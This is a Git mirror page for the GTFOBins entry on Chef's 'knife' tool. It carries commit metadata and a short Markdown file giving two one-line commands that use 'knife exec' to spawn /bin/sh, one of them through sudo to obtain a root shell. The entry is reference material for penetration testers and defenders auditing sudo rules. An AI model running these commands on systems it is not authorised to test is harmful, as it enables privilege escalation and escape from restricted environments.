1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-16 17:01:38 +02:00
GTFOBins.github.io/_gtfobins/knife.md
Nasef ee3eb38ee4
Add knife and ansible-playbook
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2021-07-13 18:38:09 +02:00

11 lines
219 B
Markdown

---
description: This is capable of running [`ruby`](/gtfobins/ruby/) code.
functions:
shell:
- code: |
knife exec -E 'exec "/bin/sh"'
sudo:
- code: |
sudo knife exec -E 'exec "/bin/sh"'
---